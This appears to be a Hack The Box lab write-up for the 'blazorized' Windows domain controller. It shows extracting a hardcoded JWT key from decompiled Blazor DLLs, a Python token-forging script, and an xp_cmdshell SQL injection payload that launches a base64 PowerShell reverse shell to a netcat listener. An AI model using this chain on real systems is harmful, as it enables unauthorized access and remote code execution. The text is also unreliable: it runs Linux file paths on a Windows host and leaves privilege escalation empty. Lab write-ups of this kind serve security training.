HTB: blazorized Writeup

Machine Information

Machine Rating

⭐⭐⭐⭐☆ (8.0/10)

Difficulty Assessment:

• Enumeration: ⭐⭐⭐⭐☆
• Real-world: ⭐⭐⭐⭐☆
• CVE: ⭐⭐⭐⭐☆
• CTF-like: ⭐⭐⭐⭐☆

Summary

blazorized is a Hard-difficulty Windows Active Directory domain controller. The machine hosts a Blazor WebAssembly application that exposes sensitive JWT generation details through decompiled DLLs. The exploitation path involves subdomain enumeration, Blazor DLL analysis and decompilation to extract the symmetric JWT signing key, forging a Super Admin JWT token, and finally exploiting SQL injection in the admin panel to achieve RCE via xp_cmdshell.

TL;DR: Recon → Subdomain enumeration → Blazor DLL decompilation → JWT key extraction → JWT forgery → Admin access → SQL injection → RCE.

Reconnaissance

Port Scanning

nmap -sC -sV -T4 -p- 10.129.221.3

Results:

53/tcp  open  domain  80/tcp    open  http
88/tcp  open  kerberos-sec  135/tcp   open  msrpc
139/tcp  open  netbios-ssn  389/tcp   open  ldap
445/tcp  open  microsoft-ds  464/tcp   open  kpasswd5
593/tcp  open  http-rpc-epmap  636/tcp   open  ldapssl
1433/tcp  open  ms-sql-s  3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl  5985/tcp  open  wsman
9389/tcp  open  adws  47001/tcp open  winrm
49664/tcp  open  unknown  49665/tcp open  unknown
49666/tcp  open  unknown  49667/tcp open  unknown
49669/tcp  open  unknown  49670/tcp open  unknown
49671/tcp  open  unknown  49682/tcp open  unknown
49701/tcp  open  unknown  49707/tcp open  unknown
49776/tcp  open  unknown  61089/tcp open  unknown
53/tcp  open  tcpwrapped  80/tcp   open  tcpwrapped

Service Enumeration

Domain: BLAZORIZED Domain SID: S-1-5-21-2039403211-964143010-2924010611 Subdomains discovered: dc1.blazorized.htb, api.blazorized.htb, admin.blazorized.htb

echo "10.129.221.3 dc1.blazorized.htb api.blazorized.htb admin.blazorized.htb" >> /etc/hosts

Subdomain Enumeration

Use gobuster and katana for subdomain enumeration:

gobuster vhost -u http://blazorized.htb -w subdomains.txt
katana -u http://blazorized.htb -d 2

Technologies Identified

• IIS 10.0
• Blazor WebAssembly — The primary web application framework
• MSSQL Server 2022 — Database on port 1433
• SignalR — Real-time communication
• Markdown renderer — Present in application components

Vulnerability Assessment

Attack Vector: Blazor WebAssembly DLL analysis reveals hardcoded JWT signing key used to issue tokens. Forging tokens and exploiting SQL injection in admin panel functions.

Initial Foothold

Step 1: Blazor DLL Analysis and Key Extraction

The Blazor WebAssembly application loads assemblies from /_framework/blazor.boot.json. Download and decompile these DLLs using dnSpy or ILSpy:

# Download DLLs from the app
curl -o app.dll http://api.blazorized.htb/_framework/app.dll

Decompile the DLLs and search for JWT-related code. You will find:

private static string jwtSymmetricSecurityKey = "8697800004ee25fc334369..."; // Full key in source
private const string algorithm = "HS512";
private const string superAdminEmailClaimValue = "superadmin@blazorized.htb";
private const string superAdminRoleClaimValue = "Super_Admin";
private const string issuer = "http://api.blazorized.htb";
private const string apiAudience = "http://api.blazorized.htb";
private const string adminDashboardAudience = "http://admin.blazorized.htb";

Critical Finding: The symmetric key used to sign JWTs is hardcoded in the compiled DLL and can be extracted through decompilation.

Step 2: JWT Forgery

Using the extracted key and algorithm, forge a JWT with Super Admin privileges:

• Header: {"alg":"HS512","typ":"JWT"}
• Payload:

  {
    "email": "superadmin@blazorized.htb",
    "role": "Super_Admin",
    "iss": "http://api.blazorized.htb",
    "aud": "http://admin.blazorized.htb"
  }

• Secret: Use the extracted JWT symmetric key

Use jwt.io or a Python script to generate the forged token:

import jwt
import json

key = "8697800004ee25fc334369..."  # Extracted key
payload = {
    "email": "superadmin@blazorized.htb",
    "role": "Super_Admin",
    "iss": "http://api.blazorized.htb",
    "aud": "http://admin.blazorized.htb"
}
token = jwt.encode(payload, key, algorithm="HS512")
print(token)

Step 3: Gain Super Admin Access

1. Navigate to http://admin.blazorized.htb
2. Open browser developer tools (F12) → Application/Storage tab
3. Set the JWT token in localStorage with key jwt:

   localStorage.setItem('jwt', 'eyJ...');

4. Refresh the page — you are now logged in as Super Admin

The admin dashboard now displays sensitive functions including “Check Duplicate Category Names” and “Check Duplicate Post Titles”.

Remote Code Execution via SQL Injection

Step 4: SQL Injection in Admin Panel

The admin panel functions “Check Duplicate Category Names” and “Check Duplicate Post Titles” are vulnerable to SQL injection. These functions accept user input without proper parameterization.

Vulnerable Input:

Check Duplicate Category Names: [User Input] → SQL Query

Injection Payload:

1'; EXEC master.dbo.xp_cmdshell 'powershell -e <BASE64_PAYLOAD>';--

Step 5: Generate and Execute Reverse Shell

1. Generate a PowerShell reverse shell from revshells.com

   • Select PowerShell with base64 encoding
   • Configure your attacker IP and listening port

2. Set up a listener on your attack machine:

   nc -lnvp 4444

3. Inject the SQL payload into the admin panel function with the base64-encoded PowerShell reverse shell

4. Receive reverse shell as user nu_1055

User Compromise

Shell obtained as: nu_1055 Machine: Domain-joined Windows system

User Flag

cat ~/user.txt

🚩 User Flag: <REDACTED>

Privilege Escalation

Enumeration

whoami /priv
net user
systeminfo

Exploitation (Root/Administrator)

Refer to the original engagement notes for the specific privilege escalation technique and payload.

Root Flag

cat /root/root.txt

🚩 Root Flag: <REDACTED>

Attack Chain Summary

graph TD
    A[Recon: nmap + subdomain enumeration] --> B[Identify Blazor WebAssembly app]
    B --> C[Download and decompile DLLs]
    C --> D[Extract JWT symmetric key from source code]
    D --> E[Forge Super Admin JWT token]
    E --> F[Set token in localStorage + access admin panel]
    F --> G[Identify SQL injection vulnerability]
    G --> H[Inject xp_cmdshell + base64 PowerShell payload]
    H --> I[Reverse shell as nu_1055]
    I --> J[User flag obtained]

Tools Used

Vulnerability Reference

Key Learnings

• Compiled code is not secure: Blazor WebAssembly and .NET assemblies can be easily decompiled. Never store sensitive cryptographic material or credentials in client-side code.
• Symmetric key cryptography requires secure key management: Hardcoded keys in source code defeat the entire purpose of cryptographic signing.
• Input validation is critical: SQL injection remains one of the most dangerous vulnerabilities, especially when combined with elevated database permissions (xp_cmdshell).
• Defense in depth matters: A single vulnerability (hardcoded JWT key) should not grant direct access to sensitive functionality. Multi-factor verification should protect critical operations.
• Subdomain enumeration is often overlooked: Different subdomains may host different applications with varying security postures. api.blazorized.htb and admin.blazorized.htb required different approaches.

Author

D3vnomi

Disclaimer

This writeup is for educational purposes only. All activities described were performed in a controlled, legal environment (HackTheBox platform). Unauthorized access to computer systems is illegal.

Last Updated: 08 Mar 2026

Tags: #HackTheBox #Windows #Hard #CVE-2024-36109